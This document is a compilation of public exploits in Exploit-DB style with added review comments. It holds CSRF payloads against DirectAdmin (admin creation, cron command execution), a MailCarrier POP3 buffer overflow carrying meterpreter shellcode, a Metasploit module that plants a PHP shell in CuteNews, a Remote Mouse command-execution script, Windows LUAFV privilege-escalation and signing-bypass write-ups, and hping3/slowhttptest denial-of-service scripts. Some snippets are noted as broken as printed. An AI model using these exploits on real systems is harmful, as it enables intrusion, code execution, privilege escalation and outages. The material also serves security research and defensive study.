// required no anti-CSRF token at the time (the advisory says this has since
// been fixed).
// NOTE(review): in this copy the params string is broken across two lines
// and contains a "¬" that looks like an HTML-entity mangling, so as printed
// the snippet is not valid JavaScript.
var url = "http://SERVERIP:2222/CMD_ACCOUNT_ADMIN";
var params =
"fakeusernameremembered=&fakepasswordremembered=&action=create&username=username&emai
l=test%40test.com&passwd=password&passwd2=password¬ify=ye";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
// NOTE(review): withCredentials is assigned the string 'true', not a
// boolean; it is truthy, so cookies are still attached.
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type",
    "application/x-www-form-urlencoded");
vuln.send(params);
# Remote Command Execution by Cron Jobs:
// Same CSRF pattern against CMD_CRON_JOBS: an every-minute cron entry whose
// command field is attacker-chosen, i.e. the advisory's RCE vector.
// NOTE(review): in this copy the params string is broken across two lines,
// so as printed the snippet is not valid JavaScript.
var url = "http://SERVERIP:2222/CMD_CRON_JOBS";
var params =
"action=create&minute=*&hour=*&dayofmonth=*&month=*&dayofweek=*&command=command";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
// withCredentials is the string 'true' (truthy), as in the first snippet.
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type",
    "application/x-www-form-urlencoded");
vuln.send(params);
# Edit File:
// Same CSRF pattern against CMD_ADMIN_FILE_EDITOR: overwrites the file named
// in "file" with "text" using the victim admin's session.
var url = "http://SERVERIP:2222/CMD_ADMIN_FILE_EDITOR";
var params = "file=the-file-full-path&action=save&text=new-content";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
// withCredentials is the string 'true' (truthy), as in the first snippet.
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type",
    "application/x-www-form-urlencoded");
vuln.send(params);
# Create FTP Account:
// Same CSRF pattern against CMD_FTP: creates an FTP account rooted at
// /home/username (custom_val is URL-encoded).
// NOTE(review): in this copy the params string is broken across three lines,
// so as printed the snippet is not valid JavaScript.
var url = "http://SERVERIP:2222/CMD_FTP";
var params =
"fakeusernameremembered=&fakepasswordremembered=&action=create&domain=infinitumit.com.tr
&user=username&passwd=password&random=Save+Password&passwd2=password&type=domain&cu
stom_val=%2Fhome%2Fusername&create=Create";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
// withCredentials is the string 'true' (truthy), as in the first snippet.
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type",
    "application/x-www-form-urlencoded");
vuln.send(params);
# Vulnerabilities are fixed in minutes, thanks to DirectAdmin.
# InfinitumIT / For safer days...
#!/usr/bin/python
# Exploit Title: MailCarrier 2.51 - Remote Buffer Overflow in "USER" command(POP3)
# Date: 14/04/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.tabslab.com/
# Version: 2.51
# Software Link: N.A
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP Prof SP3 ENG x86
# CVE: TBC from Mitre
# Created for the Telspace Internship 2019 - Vanilla EIP Overwrite
# POC
# 1.) Change ip and port in code
# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
# 0x1b023059 : push esp # ret 0x10 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll)
# Badchars \x00\xd9
import sys
import socket
import time
#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -b "\x00\xd9" -f c
# Output of the msfvenom command quoted in the comment above (bind_tcp
# meterpreter on port 443, encoded to avoid the two bad characters listed in
# the header). Kept verbatim.
shellcode = ("\x29\xc9\x83\xe9\xb2\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
             "\x44\x9b\x1b\x0b\x83\xee\xfc\xe2\xf4\xb8\x73\x99\x0b\x44\x9b"
             "\x7b\x82\xa1\xaa\xdb\x6f\xcf\xcb\x2b\x80\x16\x97\x90\x59\x50"
             "\x10\x69\x23\x4b\x2c\x51\x2d\x75\x64\xb7\x37\x25\xe7\x19\x27"
             "\x64\x5a\xd4\x06\x45\x5c\xf9\xf9\x16\xcc\x90\x59\x54\x10\x51"
             "\x37\xcf\xd7\x0a\x73\xa7\xd3\x1a\xda\x15\x10\x42\x2b\x45\x48"
             "\x90\x42\x5c\x78\x21\x42\xcf\xaf\x90\x0a\x92\xaa\xe4\xa7\x85"
             "\x54\x16\x0a\x83\xa3\xfb\x7e\xb2\x98\x66\xf3\x7f\xe6\x3f\x7e"
             "\xa0\xc3\x90\x53\x60\x9a\xc8\x6d\xcf\x97\x50\x80\x1c\x87\x1a"
             "\xd8\xcf\x9f\x90\x0a\x94\x12\x5f\x2f\x60\xc0\x40\x6a\x1d\xc1"
             "\x4a\xf4\xa4\xc4\x44\x51\xcf\x89\xf0\x86\x19\xf3\x28\x39\x44"
             "\x9b\x73\x7c\x37\xa9\x44\x5f\x2c\xd7\x6c\x2d\x43\x64\xce\xb3"
             "\xd4\x9a\x1b\x0b\x6d\x5f\x4f\x5b\x2c\xb2\x9b\x60\x44\x64\xce"
             "\x61\x4f\xc2\x4b\xe9\xb9\xf1\x1a\x61\x46\xf3\xf1\x04\x9b\x7b"
             "\xe4\xde\xd3\xf3\x19\x0b\x45\x20\x92\xed\x2e\x8b\x4d\x5c\x2c"
             "\x59\xc0\x3c\x23\x64\xce\x8e\x84\xee\x43\x5c\x2c\x2c\xf2\x33"
             "\xbb\x64\xce\x5c\x2c\xef\xf7\x30\xa5\x64\xce\x5c\xd3\xf3\x6e"
             "\x65\x09\xfa\xe4\xde\x2e\x9b\x71\x0f\x12\xcc\x73\x09\x9d\x53"
             "\x44\xf4\x91\x18\xe3\x0b\x3a\xb6\x90\x3d\x2e\xdb\x73\x0b\x54"
             "\x9b\x1b\x5d\x2e\x9b\x73\x53\xe0\xc8\xfe\xf4\x91\x08\x48\x61"
             "\x44\xcd\x48\x5c\x2c\x99\xc2\xc3\x1b\x64\xce\x88\xbc\x9b\x65"
             "\x0c\x45\x58\x32\xcd\x31\x72\xd8\xb0\xb4\x2e\xb9\x5d\x2e\x9b"
             "\x48\xf4\x91\x9b\x1b\x0b")
# Buffer layout: 5094 bytes of filler, the 4-byte return address from the
# header comment (0x1b023059 written little-endian), a 20-byte NOP sled, the
# shellcode, then "C" padding so that shellcode + padding is 882 bytes.
buffer = "A" * 5094 + "\x59\x30\x02\x1b" + "\x90" * 20 + shellcode + "C" * (882-len(shellcode))
print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n"
print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
# Target host and port are hard-coded, as the header says ("Change ip and
# port in code"). Python 2: strings are bytes, so send() accepts them as is.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# NOTE(review): connect() returns None, so ``connect`` is never meaningful;
# ``sys`` is imported but unused. No timeout is set on the socket, so each
# recv() can block indefinitely.
connect=s.connect(("192.168.0.150", 110))
print s.recv(1024)
# The buffer is the argument of the POP3 USER command.
s.send('USER ' + buffer + '\r\n')
print s.recv(1024)
s.send('QUIT\r\n')
s.close()
time.sleep(1)
# Reached only if every recv() returned, i.e. the service stayed up.
print "[*] Done, but if you get here the exploit failed!"
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Module metadata and options: TARGETURI (CuteNews base path) and
  # USERNAME/PASSWORD for an ordinary account (PASSWORD is optional; both
  # default to 'admin').
  def initialize(info = {})
    super(update_info(info,
      'Name' => "CuteNews 2.1.2 - 'avatar' Remote Code Execution",
      'Description' => %q(
This module exploits a command execution vulnerability in CuteNews prior to 2.1.2.
The attacker can infiltrate the server through the avatar upload process in the profile area.
There is no realistic control of the $imgsize function in "/core/modules/dashboard.php"
Header content of the file can be changed and the control can be bypassed.
We can use the "GIF" header for this process.
An ordinary user is enough to exploit the vulnerability. No need for admin user.
The module creates a file for you and allows RCE.
),
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module
        ],
      'References' =>
        [
          ['URL', 'http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-Metasploit.html'],
          ['URL', 'http://cutephp.com'] # Official Website
        ],
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Targets' => [['Automatic', {}]],
      'Privileged' => false,
      'DisclosureDate' => "Apr 14 2019",
      'DefaultTarget' => 0))
    register_options(
      [
        OptString.new('TARGETURI', [true, "Base CutePHP directory path", '/CuteNews']),
        OptString.new('USERNAME', [true, "Username to authenticate with", 'admin']),
        OptString.new('PASSWORD', [false, "Password to authenticate with", 'admin'])
      ]
    )
  end

  # Requests uploads/avatar_<USERNAME>_<@shell> so the uploaded file runs.
  # @shell is set by upload_shell. The response is assigned but never used.
  # NOTE(review): the name shadows Kernel#exec for this module instance.
  # Nothing registers the uploaded file for cleanup, so it stays on the
  # target after the run.
  def exec
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "uploads","avatar_#{datastore['USERNAME']}_#{@shell}") # shell url
    })
  end

  ##
  # Login and cookie information gathering
  ##
  # POSTs the credentials to index.php (action=dologin), keeps whatever
  # Set-Cookie values come back, and confirms them with a GET of index.php.
  # Returns the cookie string, or ends the run with Failure::NoAccess (so the
  # trailing `return nil` is unreachable). `check` is unused. Neither
  # response is nil-checked.
  def login(uname, pass, check)
    # 1st request to get cookie
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'vars_post' => {
        'action' => 'dologin',
        'username' => uname,
        'password' => pass
      }
    )
    cookie = res.get_cookies
    # 2nd request to cookie validation
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "index.php"),
      'cookie' => cookie
    })
    # NOTE(review): single `=`. This assigns (200 && (res.body =~ /dashboard/))
    # to res.code and branches on the assigned value, so the status is never
    # compared: success means only "body mentions dashboard". `==` was
    # presumably intended.
    if res.code = 200 && (res.body =~ /dashboard/)
      return cookie
    end
    fail_with(Failure::NoAccess, "Authentication was unsuccessful with user: #{uname}")
    return nil
  end

  # "scheme://rhost:rport" prefix used in the check output.
  def peer
    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
  end

  ##
  # Upload malicious file // payload integration
  ##
  # Loads the profile page (mod=main&opt=personal) to scrape the two
  # __signature_* hidden fields, then re-submits the profile form as
  # multipart with the payload as avatar_file. The part body starts with the
  # literal "GIF\r\n" and is labelled image/png -- the header trick the
  # description says defeats the $imgsize check -- while the file name keeps
  # a ".php" extension. Sets @shell to that name; returns true on
  # "User info updated!", otherwise ends the run with Failure::NoAccess
  # (fail_with raises, so `return false` is unreachable). `check` is unused.
  # NOTE(review): the split chains raise NoMethodError on nil when either
  # hidden field is missing from the page; res is not nil-checked.
  def upload_shell(cookie, check)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "index.php?mod=main&opt=personal"),
      'cookie' => cookie
    })
    signkey = res.body.split('__signature_key" value="')[1].split('"')[0]
    signdsi = res.body.split('__signature_dsi" value="')[1].split('"')[0]
    # data preparation
    fname = Rex::Text.rand_text_alpha_lower(8) + ".php"
    @shell = "#{fname}"
    pdata = Rex::MIME::Message.new
    pdata.add_part('main', nil, nil, 'form-data; name="mod"')
    pdata.add_part('personal', nil, nil, 'form-data; name="opt"')
    pdata.add_part("#{signkey}", nil, nil, 'form-data; name="__signature_key"')
    pdata.add_part("#{signdsi}", nil, nil, 'form-data; name="__signature_dsi"')
    pdata.add_part('', nil, nil, 'form-data; name="editpassword"')
    pdata.add_part('', nil, nil, 'form-data; name="confirmpassword"')
    pdata.add_part("#{datastore['USERNAME']}", nil, nil, 'form-data; name="editnickname"')
    pdata.add_part("GIF\r\n" + payload.encoded, 'image/png', nil, "form-data; name=\"avatar_file\"; filename=\"#{fname}\"")
    pdata.add_part('', nil, nil, 'form-data; name="more[site]"')
    pdata.add_part('', nil, nil, 'form-data; name="more[about]"')
    data = pdata.to_s
    res = send_request_cgi({
      'method' => 'POST',
      'data' => data,
      'agent' => 'Mozilla',
      'ctype' => "multipart/form-data; boundary=#{pdata.bound}",
      'cookie' => cookie,
      'uri' => normalize_uri(target_uri.path, "index.php")
    })
    if res && res.code == 200 && res.body =~ /User info updated!/
      # NOTE(review): printed after the upload request has already completed.
      print_status("Trying to upload #{fname}")
      return true
    else
      fail_with(Failure::NoAccess, 'Error occurred during uploading!')
      return false
    end
  end

  ##
  # Exploit controls and information
  ##
  # Driver: refuse to run unless `check` returns Vulnerable, log in, upload
  # the file, then request it.
  def exploit
    unless Exploit::CheckCode::Vulnerable == check
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end
    cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
    print_good("Authentication was successful with user: #{datastore['USERNAME']}")
    if upload_shell(cookie, true)
      print_good("Upload successfully.")
      exec
    end
  end

  ##
  # Version and Vulnerability Check
  ##
  # GETs index.php and scrapes the version from the 'target="_blank">CuteNews '
  # footer link. Vulnerable when the scraped string sorts before '2.1.3',
  # Safe otherwise (including any non-200), Unknown when nothing is received.
  # NOTE(review): `version < '2.1.3'` is a String comparison (lexicographic),
  # not a version comparison, and the split chain raises NoMethodError when
  # the footer text is absent from a 200 page.
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "index.php")
    })
    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end
    if res.code == 200
      version = res.body.split('target="_blank">CuteNews ')[1].split('</a>')[0]
      if version < '2.1.3'
        print_status("#{peer} - CuteNews is #{version}")
        return Exploit::CheckCode::Vulnerable
      end
    end
    return Exploit::CheckCode::Safe
  end
end
##
# The end of the adventure (o_O) // AkkuS
##
# Exploit Title: Remote Mouse 3.008 - Failure to Authenticate
# Date: 2019-09-04
# Exploit Author: 0rphon
# Software Link: https://www.remotemouse.net/
# Version: 3.008
# Tested on: Windows 10
#Remote Mouse 3.008 fails to check for authentication and will execute any command any machine gives it
#This script pops calc as proof of concept (albeit a bit slowly)
#It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself
#!/usr/bin/python2
from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM
from time import sleep
from sys import argv
def Ping(ip):
    """Probe TCP port 1978 on ``ip`` and report whether the expected banner comes back.

    Returns True when the first response equals the banner string below, False for
    any other response. If anything raises (timeout, refused connection, ...) the
    bare except prints a message and the function falls through, returning None;
    the message says "timed out" regardless of the actual cause.
    """
    expected_banner = "SIN 15win nop nop 300"
    try:
        probe = socket(AF_INET, SOCK_STREAM)
        probe.settimeout(5)
        probe.connect((ip, 1978))
        banner = probe.recv(1048)
        probe.close()
        return banner == expected_banner
    except:
        print("ERROR: Request timed out")
def MoveMouse(x,y,ip):
    """Emit relative mouse-move packets to UDP port 1978 on ``ip``.

    ``abs(x)`` packets are sent for the horizontal offset and ``abs(y)`` for the
    vertical one, each from a fresh UDP socket with a 1 ms pause in between.
    """
    def SendMouse(command,times,ip):
        # One datagram per unit of movement; the socket is never closed explicitly.
        for _ in range(times):
            sender = socket(AF_INET, SOCK_DGRAM)
            sender.sendto(command,(ip,1978))
            sleep(0.001)

    if x>0:
        SendMouse("mos 5m 1 0",x,ip)
    elif x<0:
        SendMouse("mos 5m -1 0",-x,ip)
    if y>0:
        SendMouse("mos 5m 0 1",y,ip)
    elif y<0:
        # NOTE(review): this literal says "6m" while the other three say "5m";
        # whether that is intentional cannot be told from this file.
        SendMouse("mos 6m 0 -1",-y,ip)
def MousePress(command,ip,action="click"):
    """Send a button event built from ``command`` to UDP port 1978 on ``ip``.

    ``action`` selects the suffixes sent: "down" -> " d", "up" -> " u",
    "click" -> " d" then " u" from the same socket. Any other value raises
    Exception with the offending action in the message.
    """
    suffixes_for = {"down": (" d",), "up": (" u",), "click": (" d", " u")}
    if action not in ("down", "up", "click"):
        raise Exception('MousePress: No action named "'+str(action)+'"')
    sender = socket(AF_INET, SOCK_DGRAM)
    for suffix in suffixes_for[action]:
        sender.sendto((command+suffix),(ip,1978))
def SendString(string,ip):
    """Type ``string`` one character at a time via the ``characters`` table.

    Each character is looked up in the module-level ``characters`` dict (a
    KeyError is raised for anything not in it), sent as one datagram from a
    fresh UDP socket, followed by a 0.5 s pause.
    """
    for ch in string:
        payload = characters[ch]
        socket(AF_INET, SOCK_DGRAM).sendto(payload,(ip,1978))
        sleep(0.5)
class mouse:
    """Payload strings for the three mouse buttons (class name kept lowercase for callers)."""
    leftClick, rightClick, middleClick = "mos 5R l", "mos 5R r", "mos 5R m"
# Character -> datagram payload used by SendString. Lookups of characters that
# are not keys here raise KeyError (SendString does not guard this). The
# "key N[ras]M" encoding is the application's own; per the header comment it
# was recorded from the app, it is not derived or validated here.
characters={
    "A":"key 8[ras]116", "B":"key 8[ras]119", "C":"key 8[ras]118", "D":"key 8[ras]113", "E":"key 8[ras]112",
    "F":"key 8[ras]115", "G":"key 8[ras]114", "H":"key 8[ras]125", "I":"key 8[ras]124", "J":"key 8[ras]127",
    "K":"key 8[ras]126", "L":"key 8[ras]121", "M":"key 8[ras]120", "N":"key 8[ras]123", "O":"key 8[ras]122",
    "P":"key 8[ras]101", "Q":"key 8[ras]100", "R":"key 8[ras]103", "S":"key 8[ras]102", "T":"key 7[ras]97",
    "U":"key 7[ras]96", "V":"key 7[ras]99", "W":"key 7[ras]98", "X":"key 8[ras]109", "Y":"key 8[ras]108",
    "Z":"key 8[ras]111",
    "a":"key 7[ras]84", "b":"key 7[ras]87", "c":"key 7[ras]86", "d":"key 7[ras]81", "e":"key 7[ras]80",
    "f":"key 7[ras]83", "g":"key 7[ras]82", "h":"key 7[ras]93", "i":"key 7[ras]92", "j":"key 7[ras]95",
    "k":"key 7[ras]94", "l":"key 7[ras]89", "m":"key 7[ras]88", "n":"key 7[ras]91", "o":"key 7[ras]90",
    "p":"key 7[ras]69", "q":"key 7[ras]68", "r":"key 7[ras]71", "s":"key 7[ras]70", "t":"key 7[ras]65",
    "u":"key 7[ras]64", "v":"key 7[ras]67", "w":"key 7[ras]66", "x":"key 7[ras]77", "y":"key 7[ras]76",
    "z":"key 7[ras]79",
    "1":"key 6[ras]4", "2":"key 6[ras]7", "3":"key 6[ras]6", "4":"key 6[ras]1", "5":"key 6[ras]0",
    "6":"key 6[ras]3", "7":"key 6[ras]2", "8":"key 7[ras]13", "9":"key 7[ras]12", "0":"key 6[ras]5",
    "\n":"key 3RTN", "\b":"key 3BAS", " ":"key 7[ras]21",
    "+":"key 7[ras]30", "=":"key 6[ras]8", "/":"key 7[ras]26", "_":"key 8[ras]106", "<":"key 6[ras]9",
    ">":"key 7[ras]11", "[":"key 8[ras]110", "]":"key 8[ras]104", "!":"key 7[ras]20", "@":"key 8[ras]117",
    "#":"key 7[ras]22", "$":"key 7[ras]17", "%":"key 7[ras]16", "^":"key 8[ras]107", "&":"key 7[ras]19",
    "*":"key 7[ras]31", "(":"key 7[ras]29", ")":"key 7[ras]28", "-":"key 7[ras]24", "'":"key 7[ras]18",
    '"':"key 7[ras]23", ":":"key 7[ras]15", ";":"key 7[ras]14", "?":"key 7[ras]10", "`":"key 7[ras]85",
    "~":"key 7[ras]75", "\\":"key 8[ras]105", "|":"key 7[ras]73", "{":"key 7[ras]78", "}":"key 7[ras]72",
    ",":"key 7[ras]25", ".":"key 7[ras]27"
}
def PopCalc(ip):
    """Proof-of-concept sequence: move, click, type a command, press Enter, report.

    Fixed call order; the two 1 s pauses are part of the observed behavior.
    """
    typed = "calc.exe"
    # Large negative x / positive y offset (directions depend on the app, not shown here).
    MoveMouse(-5000, 3000, ip)
    MousePress(mouse.leftClick, ip)
    sleep(1)
    SendString(typed, ip)
    sleep(1)
    SendString("\n", ip)
    print("SUCCESS! Process %s has run on target" % typed, ip)
def main():
    """Entry point: read the target IP from argv[1], probe it with Ping, then run PopCalc.

    Exits with a usage message when no argument was given, and with an error when
    Ping does not return True (which includes Ping's None-on-exception result).
    """
    if len(argv) < 2:
        print("ERROR: You forgot to enter an IP! example: exploit.py 10.0.0.1")
        exit()
    targetIP = argv[1]
    if not Ping(targetIP):
        print("ERROR: Target machine is not running RemoteMouse")
        exit()
    PopCalc(targetIP)
# Run main() only when executed as a script, not when imported.
if __name__=="__main__":
    main()
Windows: LUAFV Delayed Virtualization Cache Manager Poisoning EoP
Platform: Windows 10 1809 (not tested earlier)
Class: Elevation of Privilege
Security Boundary (per Windows Security Service Criteria): User boundary
Summary:
The LUAFV driver can confuse the cache and memory manager to replace the contents of privileged file leading to EoP.
Description:
NOTE: This is different from issue 49895, that opens a backing file which could be overwritten as it wasn’t opened with the correct permissions. This issue instead replaces the cache data for an existing system file. Also note the additional section at the end which describes how this issue also causes a Bug Check. I’m not convinced it’s exploitable so I’m not reporting it separately.
The LUAFV driver supports many normal file operations to make virtualization as seamless as possible. This includes supporting memory mapping the file. When using delayed virtualization the driver allows mapping the original file read-only (as a data section or image section) without automatically creating the file in the virtual store. This trick is achieved by copying the real file’s SECTION_OBJECT_POINTERS (SOP) pointer from the file object opened in LuafvDelayOrVirtualizeFile to the top-level “virtual” file object.
When creating a new section for a file object the kernel calls MiCreateImageOrDataSection. After checking some parameters it calls MiCallCreateSectionFilters. This is important for virtualization as this results in calling LuafvPreAcquireForSectionSynchronization in the LUAFV driver. If that function detects that the caller is trying to map the section writable then LuafvPreWrite is called which will complete the delayed virtualization process, and will update the SOP pointer of the “virtual” file to the newly created backing file. If the file is not being mapped writable then the LUAFV driver leaves the SOP pointing to the “real” file.
MiCreateImageOrDataSection then checks whether the SOP::DataSectionObject CONTROL_AREA is populated. If not the kernel calls into MiCreateNewSection to setup a new one otherwise it’ll try and reuse the existing one which is present in the “virtual” file. If a new CONTROL_AREA is created it contains a reference to the “virtual” file, not the underlying system file. This control area gets written into the SOP structure of the “virtual” file, which when performing a read-only mapping results in writing to the SOP structure of the underlying “real” file.
The SOP structure is the responsibility of the filesystem driver, so when opening an NTFS file it’s the NTFS driver which allocates and sets up this pointer. However the contents of the structure are the responsibility of the cache manager. In order to support sharing mappings, especially for image mappings, the NTFS driver ensures that the same file in a volume returns the same SOP structure even if the FILE_OBJECT pointer is different. This is where the bug lies, perhaps it’s easier to explain how to exploit this:
1) Open a file for read/write access which will be delay virtualized. For example a file in system32 which isn’t owned by TrustedInstaller.
2) Create a read-only section based on the virtualized file. As this is read-only the LuafvPreAcquireForSectionSynchronization function won’t complete the delayed virtualization. Do not map the section.
3) As long as the file doesn’t already have a DataSectionObject entry (likely if the file’s never opened/read from) then a new CONTROL_AREA is created, backed by the “virtual” file.
4) Now cause the delayed virtualization process to complete, by sending an FSCONTROL code. The “virtual” file is now backed by a file in the virtual store which can be modified by the user, and the “virtual” file’s SOP is replaced accordingly. However the DataSectionObject in the “real” file’s SOP still refers to the virtual file. Now when reading data from the “real” file handle (even one opened directly without virtualization) the cache manager reads page contents from virtual store file, not the real file.
Once you’ve replaced a system file you can get direct EoP by replacing the contents with a PE file which can be loaded using services such as the “Diagnostics Hub Standard Collector Service” which I’ve detailed before. This works because the exploit has replaced the cache for that file and as it's shared between all FILE_OBJECT instances (at least until the cache cleans it up) the image section is created backed on the cached data. The replaced file contents will also be returned for direct reads; the file doesn’t have to be mapped to return the poisoned cache data.
One limitation to this vulnerability is you can’t extend the length of the file, but there are suitable files in system32 which can contain a suitably small PE file to perform the full exploit. Note that it also doesn’t really overwrite the file on disk, instead it poisons the cache with the wrong backing file. After a reboot the file will be back to normal, even if the cache is flushed back to disk (perhaps a privileged process opened the file) I’d expect the new data to be flushed back to the store file not the “real” file.
Fixing wise, one way you could go would be to always virtualize the file when mapped as a section regardless of the requested access. However I can’t be certain there’s not another route to this which could be exploited, for example just reading from the file might be sufficient to poison the cache if done at the right time.
These operations can’t be done from any sandbox that I know of so it’s only a user to system privilege escalation.
ADDITIONAL NOTE:
As the FILE_OBJECT can’t be completely locked across all the file operations the kernel makes use of Auto Boost to lock certain structures such as the SECTION_OBJECT_POINTERS and CONTROL_AREAs. The LUAFV driver doesn’t know anything about this so it’s possible to get delayed virtualization to complete from another thread in the middle of section creation resulting in mismatched pointers and ultimately a bug check. The easiest way to achieve the bug check is to map a virtualized file as an image with the Microsoft Signed mitigation policy enabled. If the file isn’t correctly signed then it will cause the section creation to fail, but after the CONTROL_AREA has been setup. As it’s possible to oplock on the kernel opening catalog files the delayed virtualization process can be completed at the right moment resulting in a lock mismatch when tearing down the setup CONTROL_AREA.
I can’t really tell if this is exploitable or not (I’m siding with no), but as it’s related I thought I should report it to ensure what ever fix for the current issue covers this edge case as well, or at least doesn’t make it work. I’ve provided a kernel crash report “additional_crash.txt” with this report, and I can provide a PoC if required.
Proof of Concept:
I’ve provided a PoC as a C# project. It will poison the cache for the file license.rtf in system32 with arbitrary contents. Note it uses a hardlink to virtualize the file, but it doesn’t have to, as it could open the system32 file itself. It’s just done that way as it was easier to test and doesn’t impact the exploit. Also note that if the license.rtf file has already been opened and the cache manager has created an entry then the exploit fails. In theory this entry would be deleted eventually (perhaps only under memory pressure), but a quick reboot usually fixes it unless your system opens license.rtf every time it starts.
1) Compile the C# project. It’ll need to pull NtApiDotNet from NuGet to build.
2) As a normal user run the PoC.
3) Open the file %WINDIR%\System32\license.rtf in notepad to see the contents.
Expected Result:
The license.rtf file contains the original RTF contents.
Observed Result:
The virtualization poisoned the contents of license.rtf with a new text string.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46717.zip
Windows: LUAFV NtSetCachedSigningLevel Device Guard Bypass
Platform: Windows 10 1809 (not tested earlier). Note I’ve not tested this on Windows 10 SMode.
Class: Security Feature Bypass
Summary:
The NtSetCachedSigningLevel system call can be tricked by the operation of LUAFV to apply a cached signature to an arbitrary file leading to a bypass of code signing enforcement under UMCI with Device Guard.
Description:
As I’ve hit this API multiple times by now I’m not going to explain its operation. The novel aspect of this issue is that you can get the LUAFV driver to win the signing race between reading the file to determine the hash to sign and the file the kernel EA is assigned to.
The exploit is as follows:
1) Create a file with the contents of a valid Microsoft signed file, such as notepad.exe in a virtualized location.
2) Get LUAFV to virtualize that file by requesting DELETE access. DELETE is not considered a write access right for the purposes of any checks in the signing process.
3) Copy the unsigned executable to the virtual store with the target virtualized name.
4) Call NtSetCachedSigningLevel on the virtualized file specifying flag 4.
This sequence results in the signing code reading the virtualized file, which contains the contents of notepad.exe and generating the signature based on that data. However when it goes to write the kernel EA the LUAFV driver considers that a write operation and virtualizes the file underneath. As we’ve created an arbitrary file in the virtual store the driver binds the file object to the unsigned file before writing out the kernel EA. This results in the EA going to the unsigned file rather than the original signed file. As you can’t virtualize files with executable extensions you must ensure the signed file has an allowed extension, however once you’ve signed the file you can rename it to something more appropriate.
Note that I have checked that Windows 10 Pro SMode does load the LUAFV driver, however I’ve not checked that this bypass will work on it (but no reason to believe it doesn’t).
Proof of Concept:
I’ve provided a PoC as a C# project. It will sign an arbitrary DLL file, then map it into memory with the Microsoft-only signature mitigation enabled.
1) Compile the C# project. It’ll need to pull NtApiDotNet from NuGet to build.
2) As a normal user run the PoC passing the path to an unsigned DLL which will do something noticeable in DllMain (such as popping a message box).
Expected Result:
The cached signature operation fails.
Observed Result:
An arbitrary file is cache-signed and can be loaded with an elevated process signature level.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46716.zip
# Exploit Title:ASUS HG100 devices denial of service(DOS) via IPv4 packets/SlowHTTPDOS
# Date: 2019-04-14
# Exploit Author: YinT Wang
# Vendor Homepage: www.asus.com
# Version: Hardware version: HG100, Firmware version: 1.05.12
# Tested on: Current 1.05.12
# CVE : CVE-2018-11492
1. Description
An attacker on the same local network segment can crash the device via hping3 or slowhttptest (the slowhttptest variant is not covered by CVE-2018-11492).
2.Proof of Concept
Executing either of the following scripts in Kali crashes the device.
1. IPv4 packet flood resulting in a device crash, written as a Linux shell script.
#needed to co-operate with hping3 tool
#with the time period at least 220s which could cause web server of HG100 devices crash
#!/bin/bash
# Prompt for the device address, run hping3 with the flags shown, wait 220 s,
# then echo a summary of what was run. The shebang is on the third line here,
# after two comment lines, so it is not honored as a shebang by the loader.
read -p "enter the ip of HG100 here " url
hping3 -V -c 10000 -S -w 64 --flood --rand-source $url
sleep 220
# The summary text uses en-dashes (–V, –c, ...) and single dashes for the long
# options, so it does not match the command actually executed above.
echo "Hping3 –V –c 10000 –S –w 64 –flood –rand-source $url time 220s"
exit 0
2. Slow HTTP test causing the device to crash, written as a Linux shell script.
#needed to co-operate with slowhttptest tool
#with the time period 600s which could cause web server of HG100 devices crash
#!/bin/bash
# Prompt for the device URL (scheme, host and port), run slowhttptest with the
# flags shown for 600 s (-l 600), sleep for the same period, then echo a
# summary. As above, the shebang is not on the first line of the file.
read -p "enter the ip of HG100 with port here ex: http://x.x.x.x:123 " url
slowhttptest -H -R -c 10000 -l 600 -u $url
sleep 600
echo "slowhttptest -H -R -c 10000 -l 600 -u $url time 600s"
exit 0
#!/usr/bin/python
# Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in "RETR" command(POP3)
# Date: 16/04/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.tabslab.com/
# Version: 2.51
# Software Link: N.A
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP Prof SP3 ENG x86
# CVE: TBC from Mitre
